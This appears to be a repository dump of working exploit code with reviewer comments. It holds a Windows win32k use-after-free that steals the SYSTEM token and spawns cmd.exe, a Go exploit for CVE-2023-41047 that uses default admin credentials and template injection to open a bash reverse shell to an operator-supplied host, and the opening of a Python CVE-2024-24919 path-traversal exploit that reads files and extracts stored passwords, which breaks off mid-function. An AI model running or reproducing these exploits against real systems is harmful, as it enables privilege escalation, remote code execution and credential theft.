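// Fixes vs the original: GetModuleHandleA instead of a LoadLibraryA whose
// reference was never released (user32 is necessarily loaded once a menu
// handle exists), the always-true `if (add)` and the unused locals / IsMenu
// lookup were removed, and the local that shadowed the HANDLE typedef was
// renamed.
PVOID
GetMenuHandle(HMENU menu_D)
{
    const DWORD kHandleTableRva = 0xbd688;
    HMODULE hUser32 = GetModuleHandleA("USER32.DLL");
    if (hUser32 == NULL)
    {
        return NULL;
    }
    ULONGLONG tableBase = 0;
    memcpy(&tableBase, (PBYTE)hUser32 + kHandleTableRva, sizeof(tableBase));
    if (tableBase == 0)
    {
        return NULL;
    }
    // Only the low 16 bits of the handle index the table.
    PBYTE entry = (PBYTE)(tableBase + 0x18 * (ULONGLONG)(WORD)menu_D);
    ULONGLONG kernelObject = *(ULONGLONG*)entry;
    PBYTE mappedObject = (PBYTE)(kernelObject - GS_off + 0x20);
    return *(PVOID*)mappedObject;
}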
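// Same lookup as GetMenuHandle(). buildmem() passes window handles through
// here (cast to HMENU) because only the 16-bit handle index is used.
// type_hanlde is kept for interface compatibility; it was never consulted.
//
// The original was a verbatim copy of GetMenuHandle() with extra dead locals;
// delegating removes the duplication and the per-call LoadLibraryA leak.
PVOID
xxGetHMValidateHandle(HMENU menu_D, DWORD type_hanlde)
{
    (void)type_hanlde;
    return GetMenuHandle(menu_D);
}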
// Registers eight window classes named "AAAA...A@A0" .. "@A7". Called from
// WndProc right after hSubMenu is destroyed; the class objects are never used,
// so the apparent purpose is to reoccupy the freed popup-menu allocation with
// objects of a matching size (see the linked writeup). Registration failures
// (e.g. a class that already exists) are ignored, as before.
static
VOID
xxReallocPopupMenu(VOID)
{
    static const WCHAR kNameFormat[] =
        L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@A%d";
    for (INT idx = 0; idx < 0x8; idx++)
    {
        WCHAR className[0x100] = { 0 };
        wsprintfW(className, kNameFormat, idx);

        WNDCLASSEXW wc = { 0 };
        wc.cbSize = sizeof(WNDCLASSEXA);   // identical size to WNDCLASSEXW
        wc.lpfnWndProc = DefWindowProcW;
        wc.cbWndExtra = 0;
        wc.hInstance = GetModuleHandleA(NULL);
        wc.lpszMenuName = NULL;
        wc.lpszClassName = className;
        RegisterClassExW(&wc);
    }
}
// Registers twenty window classes "A@A9" .. "A@A28", each with 0x1a0 bytes of
// class extra memory and 0x20 bytes of window extra memory, then creates one
// visible zero-sized window per class and stores it in HWND_list1[9..28].
// Slots 0..8 and 29..31 of HWND_list1 are left untouched (NULL).
// Registration failures are ignored, as before.
VOID
createclass(VOID)
{
    const INT kFirst = 9;
    const INT kEnd = 29;   // exclusive
    WCHAR className[0x100] = { 0 };

    for (INT idx = kFirst; idx < kEnd; idx++)
    {
        wsprintfW(className, L"A@A%d", idx);
        WNDCLASSEXW wc = { 0 };
        wc.cbSize = sizeof(WNDCLASSEXA);
        wc.lpfnWndProc = DefWindowProcW;
        wc.cbWndExtra = 0x20;
        wc.hInstance = GetModuleHandleA(NULL);
        wc.lpszMenuName = NULL;
        wc.lpszClassName = className;
        wc.cbClsExtra = 0x1a0;
        RegisterClassExW(&wc);
    }

    for (INT idx = kFirst; idx < kEnd; idx++)
    {
        wsprintfW(className, L"A@A%d", idx);
        HWND_list1[idx] = CreateWindowEx(NULL, className, NULL, WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
    }
}
// Arbitrary 8-byte read primitive.
// Repoints the fake menu's rgItems at address-0x48 and asks GetMenuBarInfo for
// item 1 of the menu bar of HWND_list[max+1]; the rcBar.left / rcBar.top it
// reports are lifted from the "item" record win32k finds there and are
// reassembled as one QWORD (left = low 32 bits, top = high 32 bits).
// The -0x48 bias is build-specific. Only meaningful once exploit() has made
// HWND_list[max+1] use g_pFakeMenu; before that the result is garbage.
ULONG64 Read64(ULONG64 address)
{
MENUBARINFO mbi = { 0 };
mbi.cbSize = sizeof(MENUBARINFO);
g_pFakeMenu->rgItems = PVOID(address - 0x48);
GetMenuBarInfo(HWND_list[max+1], OBJID_MENU, 1, &mbi);
return (unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32);
}
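// Turns the corrupted class/window state built by buildmem() into a SYSTEM
// token for this process, then spawns cmd.exe via syytem().
//
//  1. SetClassLongPtr(HWND_list1[i], 0x270, g_pFakeMenu) on every slot:
//     0x270 is beyond the 0x1a0 bytes of class extra memory createclass()
//     reserved, so a non-zero return (the old value) marks the class object
//     that landed next to HWND_list[max+1]'s tagWND — presumably its menu
//     pointer now points at the fake menu, which is what makes Read64() work.
//     Slots outside 9..28 are NULL and simply fail.
//  2. tagWND(max+1)+0x10 -> THREADINFO -> +0x220 -> "eprocess", then walk the
//     process list (+0x08 per step, PID at -0x08) until PID 4 (System).
//  3. Read System's token at +0x68 from its list entry, point a fake
//     class-extra block (HWND_class) at eprocess+0x290, temporarily make it
//     HWND_list[max+1]'s class via the same out-of-bounds class write, write
//     the token through it, then restore the original class pointer.
//
// NOTE(review): the original comments call the +0x220 value PROCESSINFO while
// the variable is named eprocess, and the unused EPROCESS_*_OFFSET macros at
// the top of the file (0x440/0x448/0x4b8) do not agree with the offsets used
// here (+0x68 from the links would be 0x4b0). One of the two sets is stale;
// confirm against the target build before reusing either.
//
// Fixes vs the original: the "pSys/tem Token" log typo and an unused
// MENUBARINFO local. Offsets and the call sequence are unchanged.
void exploit()
{
    for (int i = 0; i < 0x20; i++)
    {
        ULONG64 pmenu = SetClassLongPtr(HWND_list1[i], 0x270, (LONG_PTR)g_pFakeMenu);
        if (pmenu != 0)
        {
            Hwnd_num = i;
        }
    }

    // Token stealing
    ULONG64 p = Read64(HWND_add + 0x250 + 0x10); // tagWND(max+1)+0x10 ("USER_THREADINFO" in the original)
    p = Read64(p);                               // THREADINFO
    p = Read64(p + 0x220);                       // PROCESSINFO / EPROCESS — see NOTE(review) above
    ULONG64 eprocess = p;
    printf("Current EPROCESS = %llx\n", eprocess);

    p = Read64(p + 0x2f0);
    do {
        p = Read64(p + 0x08);                    // next list entry
        ULONG64 pid = Read64(p - 0x08);          // UniqueProcessId precedes the links
        if (pid == 4) {
            ULONG64 pSystemToken = Read64(p + 0x68);
            printf("pSystem Token = %llx \n", pSystemToken);
            HWND_class = (PULONGLONG)((PBYTE)0x303000);
            HWND_class[8] = eprocess + 0x290;    // base the fake class's extra bytes near our Token field
            HWND_class[12] = 0x100;
            HWND_class[20] = 0x303010;
            // Swap the fake class in, write the token through it, swap back.
            ULONG64 ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - 0xa0, (LONG_PTR)HWND_class);
            SetClassLongPtr(HWND_list[max + 1], 0x28, pSystemToken);
            ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - 0xa0, (LONG_PTR)ret_add);
            break;
        }
    } while (p != eprocess);

    syytem();
}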
// Prepares everything exploit() needs:
//  - reserves a 0x10000-byte RWX region at the fixed address 0x300000 and lays
//    out fake objects inside it (0x304140, 0x305300, 0x306500, 0x302000...);
//  - sprays 0x200 menus and 0x100 "NormalClass" windows (cbWndExtra 0xe0),
//    writing two constants into each window's extra bytes at 0x58 and 0x80;
//  - searches the sprayed windows for three whose mapped tagWND objects are
//    exactly 0x250 apart, records the middle one in HWND_add/max, destroys it
//    to open a hole, and calls createclass() so a class object with 0x1a0
//    extra bytes (hopefully) lands in that hole next to HWND_list[max+1];
//  - builds the fake tagMENU at 0x302000 that Read64() drives.
//
// NOTE(review), left unchanged:
//  - If VirtualAlloc at 0x300000 fails (address already in use, e.g. under
//    bottom-up ASLR or a different image base) the function returns silently
//    and WinMain continues; the first write to 0x304140 in a later call then
//    faults. Callers cannot tell the two cases apart.
//  - `ptagWNDFake1[16] = (ULONGLONG)305400;` is a decimal constant among hex
//    ones; 0x305400 would be inside the RWX region, 305400 (0x4A8F8) is not.
//    Possibly a typo — confirm against the writeup.
//  - ptagWNDFake1[11] is assigned three times; only the last value
//    (HWND_add + 0x63 - 0x120, after the search) survives. ptagWNDFake2 and
//    hHeap are set but never used.
//  - If no adjacent triple is found, HWND_add is 0 but max stays 0, so the
//    function still destroys HWND_list[0] and builds the rest; WinMain checks
//    HWND_add afterwards and bails out.
void buildmem()
{
WORD max_handle = 0;
pvShellCode = (PSHELLCODE)VirtualAlloc((PVOID)0x300000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pvShellCode == NULL)
{
return;
}
ZeroMemory(pvShellCode, 0x10000);
// Fake window-like structure; fields point back into the same region.
ptagWNDFake = (PULONGLONG)((PBYTE)0x304140);
ptagWNDFake[0] = (ULONGLONG)0x304140;
ptagWNDFake[2] = (ULONGLONG)0x304140 + 0x10;
ptagWNDFake[6] = (ULONGLONG)0x304140;
ptagWNDFake[8] = 0x305300;
ptagWNDFake[11] = (ULONGLONG)MENU_add;
ptagWNDFake[68] = (ULONGLONG)0x304140 + 0x230;
ptagWNDFake[69] = (ULONGLONG)0x304140 + 0x28;
ptagWNDFake[70] = (ULONGLONG)0x304140 + 0x30;
ptagWNDFake[71] = (ULONGLONG)0x000004;
ptagWNDFake1 = (PULONGLONG)((PBYTE)0x305300);
ptagWNDFake1[1] = (ULONGLONG)0x11;
ptagWNDFake1[2] = (ULONGLONG)0x305320;
ptagWNDFake1[6] = (ULONGLONG)0x1000000000020000;
ptagWNDFake1[8] = (ULONGLONG)0x00000000029d0000;
ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120; // HWND_add is still 0 here; re-set below
ptagWNDFake1[14] = (ULONGLONG)0x306500;
ptagWNDFake1[16] = (ULONGLONG)305400; // decimal, see NOTE(review) above
ptagWNDFake2 = (PULONGLONG)((PBYTE)0x306500);
ptagWNDFake1[11] = (ULONGLONG)0x306600;
// Spray: one class, 0x200 menus, 0x100 windows each owning a menu.
WNDCLASSEX WndClass = { 0 };
WndClass.cbSize = sizeof(WNDCLASSEX);
WndClass.lpfnWndProc = DefWindowProc;
WndClass.style = CS_VREDRAW | CS_HREDRAW;
WndClass.cbWndExtra = 0xe0;
WndClass.hInstance = NULL;
WndClass.lpszMenuName = NULL;
WndClass.lpszClassName = L"NormalClass";
RegisterClassEx(&WndClass);
for (int i = 0; i < 0x200; i++)
{
HMENUL_list[i] = CreateMenu();
}
for (int i = 0; i < 0x100; i++)
{
HWND_list[i] = CreateWindowEx(NULL, L"NormalClass", NULL, WS_VISIBLE, 0, 0, 0, 0, NULL, HMENUL_list[i], NULL, NULL);
}
// Plant two constants in every window's extra bytes (offsets 0x58 and 0x80).
for (int i = 0; i < 0x100; i++)
{
SetWindowLongPtr(HWND_list[i], 0x58, (LONG_PTR)0x0002080000000000);
SetWindowLongPtr(HWND_list[i], 0x80, (LONG_PTR)0x0000303030000000);
}
// Find windows 2i-1, 2i, 2i+1 whose mapped objects are consecutive 0x250-byte
// slots; 0x250 is therefore the tagWND allocation size on this build.
for (int i = 0x20; i < 0x60; i++)
{
if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01)- (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 - 1], 0x01)== 0x250)
{
if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 + 1], 0x01)-(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01) == 0x250)
{
HWND_add = (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i*2], 0x01);
max = i * 2;
break;
}
}
if (i == 0x5f)
{
HWND_add = 0;
}
}
ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120;
// Open a hole where the middle window was and try to fill it with a class
// object carrying 0x1a0 bytes of extra memory (createclass).
DestroyWindow(HWND_list[max]);
createclass();
// Create a fake spmenu
PVOID hHeap = (PVOID)0x302000;
g_pFakeMenu = (tagMENU*)(PVOID)0x302000;
g_pFakeMenu->ref = (PVOID)0x302300;
*(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu;
// cItems = 1
g_pFakeMenu->obj28 = (PVOID)0x302200;
*(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1;
// rgItems
g_pFakeMenu->rgItems = (PVOID)0x304000;
// cx / cy must > 0
g_pFakeMenu->flag1 = 1;
g_pFakeMenu->flag2 = 1;
g_pFakeMenu->cxMenu = 1;
g_pFakeMenu->cyMenu = 1;
//
}
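// Entry point: sets up the leak/corruption primitives and fires the bug.
//
//  - A 19-byte stub (`mov rax, gs:[0x30]` + nops + `ret`) returns the TEB
//    address; the QWORD at TEB+0x800+0x28 becomes GS_off, the delta that
//    GetMenuHandle() subtracts from kernel desktop-heap addresses to reach
//    their user-mode mapping (presumably Win32ClientInfo.ulClientDelta —
//    confirm).
//  - Four win32u.dll syscall stubs are resolved; only NtUserEnableMenuItem
//    is actually called in this file.
//  - A window with a system menu is created, MENU_add records the mapped
//    object of the popup hSubMenu, then buildmem() sprays and locates three
//    adjacent tagWND objects; abort with 0 if that search failed.
//  - hSubMenu gets items 0x2061 and 0xf060 (SC_CLOSE's id), SC_CLOSE is
//    removed from the system menu and hSubMenu is nested into it through
//    hMenuB. NtUserEnableMenuItem(hSystemMenu, 0xf060, MF_GRAYED) is then
//    called directly; while win32k walks the nested menus it calls back into
//    WndProc (message 0xae), which destroys hSubMenu — the use-after-free
//    the linked writeup describes. exploit() then performs the token swap.
//
// Fixes vs the original: the GetProcAddress result for NtUserEnableMenuItem
// is checked instead of being called blindly through a possibly-NULL pointer,
// the RWX stub page is released after use, and an unused 0xa8-byte buffer of
// 'A's was dropped.
//
// Returns 1 on setup failure, 0 if no suitable windows were found, otherwise
// the WM_QUIT exit code.
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    (void)hPrevInstance;
    (void)lpCmdLine;

    // mov rax, gs:[0x30] ; nop x9 ; ret  -> TEB address.
    unsigned char shellcode[] = "\x65\x48\x8B\x04\x25\x30\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc3";
    LPVOID executableMemory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (executableMemory == NULL) {
        return 1;
    }
    memcpy(executableMemory, shellcode, sizeof(shellcode));
    ULONGLONG gsValue = ((ULONGLONG(*)())executableMemory)();
    VirtualFree(executableMemory, 0, MEM_RELEASE);

    gsValue = gsValue + 0x800;
    GS_hanlde = (PULONGLONG)(PBYTE)gsValue;
    GS_off = GS_hanlde[5];   // TEB+0x828

    HMODULE hWin32u = GetModuleHandleA("win32u.dll");
    if (hWin32u == NULL) {
        printf("[!] win32u.dll is not loaded\n");
        return 1;
    }
    g_NtUserEnableMenuItem = (NtUserEnableMenuItem)GetProcAddress(hWin32u, "NtUserEnableMenuItem");
    g_NtUserSetClassLongPtr = (NtUserSetClassLongPtr)GetProcAddress(hWin32u, "NtUserSetClassLongPtr");
    g_NtUserCreateAcceleratorTable = (NtUserCreateAcceleratorTable)GetProcAddress(hWin32u, "NtUserCreateAcceleratorTable");
    g_pfnNtUserConsoleControl = (fnNtUserConsoleControl)GetProcAddress(hWin32u, "NtUserConsoleControl");
    if (g_NtUserEnableMenuItem == NULL) {
        printf("[!] NtUserEnableMenuItem not found in win32u.dll\n");
        return 1;
    }

    WNDCLASS wc = { 0 };
    wc.lpfnWndProc = WndProc;
    wc.hInstance = hInstance;
    wc.lpszClassName = TEXT("EnableMenuItem");
    RegisterClass(&wc);
    HWND hWnd = CreateWindow(
        wc.lpszClassName,
        TEXT("EnableMenuItem"),
        WS_OVERLAPPEDWINDOW,
        CW_USEDEFAULT,
        CW_USEDEFAULT,
        400, 300,
        NULL,
        NULL,
        hInstance,
        NULL
    );
    if (!hWnd) return FALSE;

    hSystemMenu = GetSystemMenu(hWnd, FALSE);
    hSubMenu = CreatePopupMenu();
    MENU_add = GetMenuHandle(hSubMenu);
    hMenuB = CreateMenu();
    buildmem();
    if (HWND_add == 0)
    {
        return 0;   // no three adjacent windows found; nothing safe to do
    }

    AppendMenu(hSubMenu, MF_STRING, 0x2061, TEXT("0"));
    AppendMenu(hSubMenu, MF_STRING, 0xf060, TEXT("1"));
    DeleteMenu(hSystemMenu, SC_CLOSE, MF_BYCOMMAND);
    AppendMenu(hMenuB, MF_POPUP, (UINT_PTR)hSubMenu, L"Menu A");
    AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)hMenuB, L"Menu B");
    ShowWindow(hWnd, nCmdShow);
    UpdateWindow(hWnd);

    flag = 1;   // from here on WndProc acts on message 0xae
    g_NtUserEnableMenuItem(hSystemMenu, 0xf060, 0x01);
    exploit();

    MSG msg = { 0 };
    while (GetMessage(&msg, NULL, 0, 0))
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
    return (int)msg.wParam;
}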
// Window procedure of the trigger window. Everything interesting happens on
// message 0xae (WM_NCUAHDRAWCAPTION), which — per the linked writeup — win32k
// sends back into user mode while NtUserEnableMenuItem is still walking the
// nested menus: once `flag` is set, the handler empties hMenuB, destroys
// hSubMenu (the menu the kernel is still holding) and immediately registers
// classes via xxReallocPopupMenu() to reclaim the freed allocation.
// All other messages go to DefWindowProc.
//
// NOTE(review): `case 0x1000` has no break and falls into `case 0x1001`, so
// a 0x1000 callback runs the sequence twice (a second DestroyMenu on an
// already-destroyed handle and a second batch of RegisterClassExW calls that
// fail as duplicates). Whether that repetition is deliberate grooming or an
// accidental omission cannot be settled from this file; left unchanged.
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message)
{
case WM_DESTROY:
PostQuitMessage(0);
return 0;
case 0xae:
switch (wParam)
{
case 0x1000:
if (flag)
{
int itemCount = GetMenuItemCount(hMenuB);
for (int i = itemCount - 1; i >= 0; i--) {
RemoveMenu(hMenuB, i, MF_BYPOSITION);
}
DestroyMenu(hSubMenu);
xxReallocPopupMenu();
}
// falls through to 0x1001 (no break) — see NOTE(review) above
case 0x1001:
if (flag)
{
int itemCount = GetMenuItemCount(hMenuB);
for (int i = itemCount - 1; i >= 0; i--) {
RemoveMenu(hMenuB, i, MF_BYPOSITION);
}
DestroyMenu(hSubMenu);
xxReallocPopupMenu();
}
return 0;
}
break;
}
return DefWindowProc(hWnd, message, wParam, lParam);
}
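// Spawns cmd.exe after the token swap; the child inherits this process's
// (now SYSTEM) token. Its stdout/stderr are redirected into an anonymous pipe
// that is never read and the window is hidden, so as written the shell is not
// interactive — to get a visible SYSTEM prompt drop STARTF_USESTDHANDLES and
// SW_HIDE. Kept as in the original.
//
// Returns 0 on success, -3 if the pipe cannot be created, -2 if
// CreateProcessW fails.
//
// Fixes vs the original: the success path now returns a value (the function
// fell off the end of a non-void function), the process/thread handles are
// closed, GetLastError() is captured before CloseHandle can overwrite it, and
// the unused 40 KB stack buffer and dead locals were removed. The read end of
// the pipe is deliberately kept open for the life of this process so the
// child's writes do not start failing with a broken pipe.
int syytem()
{
    SECURITY_ATTRIBUTES sa = { 0 };
    STARTUPINFOW si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    HANDLE hRead = NULL;
    HANDLE hWrite = NULL;

    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE;   // the write end must be inheritable by the child
    if (!CreatePipe(&hRead, &hWrite, &sa, 0))
    {
        return -3;
    }

    si.cb = sizeof(STARTUPINFOW);
    GetStartupInfoW(&si);
    si.hStdError = hWrite;
    si.hStdOutput = hWrite;
    si.wShowWindow = SW_HIDE;
    si.lpDesktop = L"WinSta0\\Default";
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

    wchar_t cmd[4096] = { L"cmd.exe" };   // writable: CreateProcessW may modify it
    if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
    {
        const DWORD err = GetLastError();
        CloseHandle(hWrite);
        CloseHandle(hRead);
        printf("[!] CreateProcessW Failed![%lx]\n", err);
        return -2;
    }
    CloseHandle(hWrite);        // our copy; the child holds its own
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}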
================================================
FILE: CVE-2023-41047/CVE-2023-41047.go
================================================
package main
import (
"crypto/tls"
"fmt"
"log"
"net/http"
"net/url"
"os"
"strings"
"sync"
)
// PROXYURL is taken from argv[2] in main; every request is routed through it.
// Note: url.Parse("") succeeds, so an empty value yields a scheme-less proxy
// rather than "no proxy" (see getLoginCookie / setRequest).
var (
PROXYURL = ""
)

// CSRFTOKEN is a fixed token sent as both the X-CSRF-Token header and the
// csrf_token_P5000 cookie. It looks like a value captured from one specific
// instance; whether the target accepts a foreign token is not established by
// this file — TODO confirm, and replace if requests are rejected.
const CSRFTOKEN = "ImU4ZmY1NDhlZTU1ZGI5M2I2MjA3YmZhYjAxY2QzOWQxOTRiN2Q0YTgi.ZUn0tg.OEMZhA3pw-YZTkm7INGV0FBBjZg"
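// getLoginCookie logs in at <uri>/api/login with the hard-coded admin/admin
// credentials and returns a Cookie header value that combines the fixed
// CSRFTOKEN with the session_P5000 cookie the server set. It returns "" when
// the request cannot be built or sent or when no session_P5000 cookie came
// back; callers must treat "" as a failed login. A non-200 status is logged
// but, as before, the cookies are still inspected.
//
// TLS verification is disabled (lab tool). The proxy is only configured when
// PROXYURL is non-empty.
//
// Fixes vs the original: errors from NewRequest and client.Do no longer fall
// through to a nil dereference (resp.Body.Close on a nil resp), and an empty
// PROXYURL no longer installs a scheme-less proxy.
func getLoginCookie(uri string) string {
	uri += "/api/login"
	tr := &http.Transport{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
	}
	if PROXYURL != "" {
		proxy, err := url.Parse(PROXYURL)
		if err != nil {
			log.Println("Error parsing proxy URL:", err)
			return ""
		}
		tr.Proxy = http.ProxyURL(proxy)
	}
	client := &http.Client{
		Transport: tr,
	}
	// NOTE(review): credentials are hard-coded; parameterise before reuse.
	data := `{"user":"admin","pass":"admin","remember":false}`
	req, err := http.NewRequest("POST", uri, strings.NewReader(data))
	if err != nil {
		log.Println("Error creating request:", err)
		return ""
	}
	req.Header.Set("Content-Type", "application/json; charset=UTF-8")
	resp, err := client.Do(req)
	if err != nil {
		log.Println("Error making request:", err)
		return ""
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		log.Printf("HTTP request failed with status code: %d\n", resp.StatusCode)
	}
	cookies := resp.Cookies()
	if len(cookies) == 0 {
		log.Println("No cookies found in the response.")
	}
	cookieStr := ""
	for _, cookie := range cookies {
		if cookie.Name == "session_P5000" {
			cookieStr = "csrf_token_P5000= " + CSRFTOKEN + ";" + cookie.Name + "=" + cookie.Value
		}
	}
	return cookieStr
}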
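// setRequest POSTs one JSON payload with the CSRF header and session cookie.
// types selects the endpoint: 0 -> /api/settings, 1 -> /api/connection; any
// other value posts to uri unchanged (as before). Errors are logged, never
// returned, and the response status is not inspected. wg.Done() is always
// called, so every call must be preceded by wg.Add(1).
//
// Fixes vs the original: a failed NewRequest no longer dereferences a nil
// request, the response body is closed (each call leaked a connection), and
// the proxy is only configured when PROXYURL is non-empty.
func setRequest(uri string, cookie string, payload string, types int, wg *sync.WaitGroup) {
	defer wg.Done()
	switch types {
	case 0:
		uri += "/api/settings"
	case 1:
		uri += "/api/connection"
	}
	tr := &http.Transport{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
	}
	if PROXYURL != "" {
		proxy, err := url.Parse(PROXYURL)
		if err != nil {
			log.Println("Error parsing proxy URL:", err)
			return
		}
		tr.Proxy = http.ProxyURL(proxy)
	}
	client := &http.Client{
		Transport: tr,
	}
	req, err := http.NewRequest("POST", uri, strings.NewReader(payload))
	if err != nil {
		log.Println("Error creating request:", err)
		return
	}
	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("X-CSRF-Token", CSRFTOKEN)
	req.Header.Set("Cookie", cookie)
	resp, err := client.Do(req)
	if err != nil {
		log.Println("Error making request:", err)
		return
	}
	resp.Body.Close()
}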
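// main runs the four requests in order: enable the virtual printer, store a
// gcode "afterPrinterConnected" script (a template expression that reaches
// eval() and runs a bash reverse shell to <reverse IP>:<reverse PORT>),
// connect (which executes the script), then disconnect.
//
// Fix vs the original: the steps were launched as four goroutines behind a
// single wg.Add(1), so nothing guaranteed the script was stored before the
// connect request arrived, and the surplus wg.Done() calls could panic with
// "sync: negative WaitGroup counter". They now run strictly one after
// another; if the connect call blocks while the shell is alive, the
// disconnect is simply sent once it returns. The reverse IP/port are
// interpolated into the shell command unquoted — they are operator input.
func main() {
	if len(os.Args) <= 4 {
		fmt.Println("Usage: ./CVE-2023-41047 <target> <proxyUrl> <reverse IP> <reverse PORT>")
		return
	}
	uri := os.Args[1]
	PROXYURL = os.Args[2]
	reverseIP := os.Args[3]
	reversePort := os.Args[4]
	cookie := getLoginCookie(uri)
	if cookie == "" {
		log.Println("[-] Login failed: no session cookie, aborting")
		return
	}
	var wg sync.WaitGroup
	// step runs one request synchronously; setRequest calls wg.Done itself.
	step := func(payload string, types int) {
		wg.Add(1)
		setRequest(uri, cookie, payload, types, &wg)
		wg.Wait()
	}
	log.Println("[*] Start...")
	// Turn on virtual printer
	payload := `{"plugins":{"virtual_printer":{"enabled":true}},"temperature":{"profiles":[{"name":"ABS","extruder":210,"bed":100,"chamber":null},{"name":"PLA","extruder":180,"bed":60,"chamber":null}]}}`
	step(payload, 0)
	log.Println("[+] Step 1 finish...")
	// Set evil gcode
	payload = `{"scripts":{"gcode":{"afterPrinterConnected":"{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='catch_warnings' %} {{ c.__init__.__globals__['__builtins__'].eval(\"__import__('os').popen('bash -c \\\"bash -i >&/dev/tcp/` + reverseIP + `/` + reversePort + ` 0>&1\\\"').read()\") }} {% endif %} {% endfor %}"}},"temperature":{"profiles":[{"name":"ABS","extruder":210,"bed":100,"chamber":null},{"name":"PLA","extruder":180,"bed":60,"chamber":null}]}}`
	step(payload, 0)
	log.Println("[+] Step 2 finish...")
	payload = `{"port":"AUTO","baudrate":0,"printerProfile":"_default","autoconnect":false,"command":"connect"}`
	step(payload, 1)
	log.Printf("[+] Step 3 reverse: tcp://%s:%s", reverseIP, reversePort)
	payload = `{"command":"disconnect"}`
	step(payload, 1)
}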
================================================
FILE: CVE-2024-24919/exp.py
================================================
import argparse
import requests
from urllib3.exceptions import InsecureRequestWarning
import re
import argparse
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
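def parse_bin_data(bin_data):
    """Extract (name, internal_password) pairs from a fwauth.NDB-style blob.

    Scans ``bin_data`` for ``:internal_passw???ord (<value>)`` records and
    pairs each with the nearest preceding ``:name (<value>)`` record, i.e.
    the last ``:name`` match that ends before the password match starts.
    Password records with no preceding name are dropped, as before.

    Returns a list of ``{'name': str, 'internal_password': str}`` dicts in
    file order; both values are UTF-8 decoded with undecodable bytes ignored
    and surrounding whitespace stripped.

    NOTE(review): the password pattern is kept verbatim. It requires exactly
    three arbitrary bytes between ``internal_passw`` and ``ord``, so the
    literal ``internal_password`` does NOT match; confirm against a real NDB
    dump before relying on this.

    Change vs the original: the ``:name`` regex is compiled once and the two
    match streams are merged in one pass instead of re-scanning the whole
    prefix for every password hit (quadratic on large NDB files). Results are
    identical.
    """
    password_pattern = re.compile(rb":internal_passw.{3}ord \(([^)]+)\)", re.DOTALL)
    name_pattern = re.compile(rb":name \(([^)]+)\)", re.DOTALL)

    name_matches = list(name_pattern.finditer(bin_data))
    next_name = 0      # first name match not yet passed by the scan
    last_name = None   # most recent name match ending before the current hit
    results = []
    for match in password_pattern.finditer(bin_data):
        while next_name < len(name_matches) and name_matches[next_name].end() <= match.start():
            last_name = name_matches[next_name]
            next_name += 1
        internal_password = match.group(1).decode('utf-8', errors='ignore').strip()
        if not internal_password or last_name is None:
            continue
        results.append({
            'name': last_name.group(1).decode('utf-8', errors='ignore').strip(),
            'internal_password': internal_password,
        })
    return results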
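def fget(url, filename, timeout=30):
    """Fetch one file from the target through the CVE-2024-24919 request shape.

    Sends ``GET {url}/clients/MyCRL`` whose *body* is
    ``/CSHELL/../../../../../../../{filename}`` (a body on a GET is what this
    PoC relies on). On HTTP 200 the response bytes are written to
    ``basename(filename)`` in the current directory; if the requested path
    contains ``fwauth.NDB`` the content is additionally parsed for
    ``:name`` / ``:internal_password`` pairs and printed.

    ``url`` is scheme+host (e.g. ``https://10.0.0.1``), ``filename`` an
    absolute path on the target. ``timeout`` (seconds) is new and defaults to
    30 so an unresponsive host no longer hangs the tool indefinitely.
    Certificate verification is disabled. Exits with status 1 when the server
    does not answer 200 (previously ``exit()``, i.e. status 0).

    NOTE(review): the Referer header is hard-wired to 192.168.161.110 rather
    than derived from ``url``; whether the target checks it is unknown here.
    """
    session = requests.Session()
    raw_body = "/CSHELL/../../../../../../../{}".format(filename)
    headers = {"Sec-Ch-Ua":"\"Chromium\";v=\"125\", \"Not.A/Brand\";v=\"24\"","Accept":"*/*","Sec-Ch-Ua-Platform":"\"macOS\"","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36","Referer":"https://192.168.161.110/sslvpnc/Portal/Main","Connection":"keep-alive","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"script","Accept-Encoding":"gzip, deflate, br","Accept-Language":"zh-CN,zh;q=0.9","Sec-Ch-Ua-Mobile":"?0","Sec-Fetch-Mode":"no-cors"}
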